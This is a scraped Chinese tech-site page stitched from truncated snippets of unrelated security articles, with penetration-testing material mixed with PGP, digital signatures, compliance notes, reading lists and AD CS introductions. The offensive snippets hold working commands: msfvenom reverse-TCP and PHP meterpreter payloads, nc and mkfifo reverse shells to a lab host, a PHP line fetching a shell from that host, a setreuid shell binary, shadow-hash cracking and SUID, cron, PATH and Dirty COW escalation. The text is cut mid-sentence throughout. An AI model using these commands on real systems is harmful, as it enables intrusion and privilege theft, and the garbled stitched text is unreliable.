msf hash 模块//启动 msfconsole //生成反向连接后门 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.128 lport=12345 -f exe > s.exe use exploit/multi/handler set payload windows/meterpreter/reverse_
靶场环境win10-1(域用户),win10-2(域用户),winser2016(域控)PTH(pass-the-hash) HASH 传递pass-the-hash 在内网中是一种很经典的方式,原理就是可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务,而不用提供明文密码。pass the hash 原理:在 Windows 系统中,通常会使用 NTLM 身份认证NTLM
搭建域实验环境win10,Windows server2012创建域服务进入管理器的域服务配置向导,选择添加新林接下来全部默认即可,安装完后进入重启net time /domain打开工具,进入AD用户和计算机可以看见域创建成功设置域策略进入组策略管理,右键编辑default,在windows设置->安全设置->账号策略->密码策略这里禁用复杂性要求,设置密码期限最长为0(永不过
切换用户技巧无需密码切换用户#include <stdio.h> #include <stdlib.h> #include <unistd.h> int main(int argc,char *argv[]) { setreuid(1001,1001); execve("/bin/sh",NULL,NULL); }gcc a.c -o a chmod 777 a
docker逃逸提权免sudo使用docker默认情况下使用docker必须要有sudo权限,对于一台机器多用户使用,只需要管理员将需要使用docker的用户添加到docker用户组(安装docker后默认会创建该组)中,用户重新登录机器即可免sudo使用docker了。创建docker容器后,容器默认账户是root账户,可以更改容器内的所有配置这里模拟真实情况借助弱口令使用coleak用户 登陆
john爆破root密文cat /etc/shadowroot:$6$URZ1c7qW$z5jZA6/j9fb8d4ExJOWuwCjEFo0tfBkfV.D3OIf0c0ukepcZYgrBhO6vjpNbmYct1uco9NrtBw3z50tCoMbqb1:18907:0:99999:7:::gzip -d /usr/share/wordlists/rockyou.txt.gz john -
常见suid提权文件nmap vim find more less bash cp Nano mv awk man wgetshttps://gtfobins.github.io/sudo install -m =xs $(which less) . ./less file_to_readpasswd提权ls -al /etc/passwd -rw-rw-rw-- 1 cc cc 2242 7
脏牛提权 CVE-2016-5195该漏洞是 Linux 内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞, 导致可以破坏私有只读内存映射。黑客可以在获取低权限的的本地用户后,利用此漏洞获取 其他只读内存映射的 写权限,进一步获取 root 权限。漏洞范围以下是主流发行版修复之后的内核版本,如果你的内核版本低于列表里的版本,表示还存在脏牛漏洞Centos7 /RHEL
获取完整交互式SHELLsu root su:必须从终端中执行python伪终端终端有些时候系统的命令终端不允许直接访问,可以使用python虚拟化一个终端来执行python -c 'import pty;pty.spawn("/bin/bash")' python3 -c 'import pty;pty.spawn("/bin/bash")'Linux反弹shell解决乱码bash #从zsh
反弹shellnc反弹nc -e /bin/sh 192.168.10.128 6666 #但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.10.128 6666 >/tmp/fpython反弹import socket,subproc
计划任务提权(cron Jobs)定时任务(cron job)被用于安排那些需要被周期性执行的命令。利用它,你可以配置某些命令或者脚本,让它们在某个设定的时间内周期性地运行。cron 是 Linux 或者类 Unix 系统中最为实用的工具之一。cron 服务(守护进程)在系统后台运行,并且会持续地检查 /etc/crontab 文件和 /etc/cron.*/ 目录。它同样也会检查 /var/sp
环境变量劫持提权PATH是Linux和类Unix操作系统中的环境变量,它指定存储可执行程序的所有bin和sbin目录。当用户在终端上执行任何命令时,它会通过PATH变量来响应用户执行的命令,并向shell发送请求以搜索可执行文件。超级用户通常还具有/sbin和/usr/sbin条目,以便于系统管理命令的执行。echo $PATH /usr/local/sbin:/usr/local/bin:/us
metasploit linux提权msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.10.128 LPORT=12345 -f raw > ./shell.php file_put_contents('../tmp/msf.php',file_get_contents('http://192.168.10.128/shell.ph
常用命令uname -a #查看内核/操作系统/cpu信息 hend -n 1 /etc/issue #查看操作系统版本 cat /proc/version #查看系统信息 hostname #查看计算机名 env #查看环境变量 ifconfig #查看网卡 netstat -lntp # 查看所有监听端口 netstat -antp # 查看所有已经建立的连接 netstat
0x01 密码校验 启动 TeamServer 后,会创建 SecureServerSocket 对象并且循环调用 acceptAndAuthenticate 方法等待 Controller 连接在接收到信息并验证成功以后,才会去调用 clientAuthenticated 方法来线程执行 ManageUser 以处理与 Controller 的信息当 Controller 在点击
是一个完整的电子邮件安全软件包,包括加密、鉴别、电子签名和压缩等技术。是把现有的加密算法(如RSA公钥加密算法或MD5报文摘要算法)综合在一起。提供电子邮件的安全性、发送方鉴别和报文完整性。工作原理假定A向B发送电子邮件明文X,现在用PGP进行加密。A有三个密钥:自己的私钥、B的公钥和自己生成的一次性密钥。B有两个密钥:自己的私钥和A的公钥。A需要做以下几件事:(1)对明文X进行MD5报文摘要运算
许多系统都有这样那样的安全漏洞(bugs 其中某些是操作系统或应用软件本身具有的,这些漏洞在补丁未被开发出来之前一般很难防御黑客的破坏,除非你将网线拔掉还有一些漏洞是由于系统管理员配置错误引起的,如在网络文件系统中,将目录和文件以可写的方式调出,将未加 shadow 的用户密码文件以明码方式存放在某一目录下,这都会给黑客带来可乘之机,应及时加以修正。
• attack monitor Endpoint detection & Malware analysis software • artillery The Artillery Project is an open-source blue team tool designed to protect Linux and Windows operating systems through m
(1)数字签名与信息一起发送的一串代码,不是真的手写签名。(2)用途 在电子商务和电子政务中用来鉴别信息的真伪,防止否认。(3)加密技术是数字签名的保证。
• 企业安全建设入门——基于开源软件打造企业网络安全(刘焱) • 企业安全建设指南——金融行业安全架构与技术实践(聂君等) • 大型互联网企业安全架构(石祖文) • CISSP 官方学习指南 • CISSP 认证考试指南 • Linux 系统安全纵深防御、安全扫描与入侵检测(胥峰)
• Web 安全深度学习实战(刘焱) • Web 安全机器学习入门(刘焱) • Web 安全之强化学习与 GAN(刘焱)• AI 安全之对抗样本入门(兜哥)
• 大数据治理与安全从理论到开源实践(刘驰等) • 企业大数据处理 Spark、Druid、Flume 与 Kafka 应用实践(肖冠宇) • 数据安全架构设计与实战(郑云文)
等保是一个全方位系统安全性标准,不仅仅是程序安全,包括:物理安全、应用安全、通信安全、边界安全、环境安全、管理安全等方面。【物理安全】机房物理访问控制、防火,防雷击,温湿度控制、电力供应,电磁防护。【应用安全】应用具备身份鉴别、访问控制、安全审计、剩余信息保护、软件容错、资源控制和代码安全。【通信安全】包括网络架构,通信传输,可信验证。【边界安全】包括边界防护,访问控制,入侵防范,恶意代码防护等。
概述在测试中,常常需要反弹shell,才能打开内网测试的通道,以及后续的权限维持。但是由于各种原因,并不是每一次反弹都是非常顺利。因此,本文总结并分析多种反弹shell的方式,希望帮助各位实战的师傅。原理首先,需要理解正向连接和反向连接,正向连接是指由客户端向服务端发起连接请求,而反向连接则是相反。在反弹shell (reverse shell) 中,由客户端监听指定的 TCP/UDP 端口,由服
• 社会工程:安全体系中的人性漏洞 • 反欺骗的艺术 • 反入侵的艺术
• 无线网络安全gong防实战 • 无线网络安全gong防实战进阶 • 黑客大揭秘——近源s透测试(柴坤哲等)
简介 组策略 (Group Policy, GP) 用于管理网络环境中的用户和设备,定义了系统管理员管理工作所要的各种模板组件。 组策略有以下功能: • 管理注册表 • 设置脚本 • 重定向文件夹 • 管理应用程序 • 指定安全选项 常用概念 组策略容器 (Group Policy Container,GPC) 存储在活动目录中,包含 GPO 属性、配置信息和版本等。可以通过 GPC 来查找 GP
证书模板 微软提供了证书模板的功能,方便在域内签发证书。证书模板是注册策略和预定义证书设置的集合,包含证 书有效期、用途、申请者等信息。 证书注册 证书可以通过以下几种方式注册: • 通过 Windows 客户端证书注册协议 (MS-WCCE) • 通过 ICertPassage 远程协议 (MS-ICPR) • 在 ADCS 开启了对应 Web 服务的情况下,使用 Web 服务注册 • 在服务器
介绍 Active Directory 证书服务 (Active Directory Certifcate Services,AD CS) 是微软用于实现 PKI 的服务。 证书 ADCS 中的证书是 X.509 格式的数字签名文档,用于加密、签名或身份验证等。 证书常用的属性由下述字段组成 • Subject:主题 • Public Key:公钥 • Extended Key Usages (E
Copyright © 2005-2024 51CTO.COM 版权所有 京ICP证060544号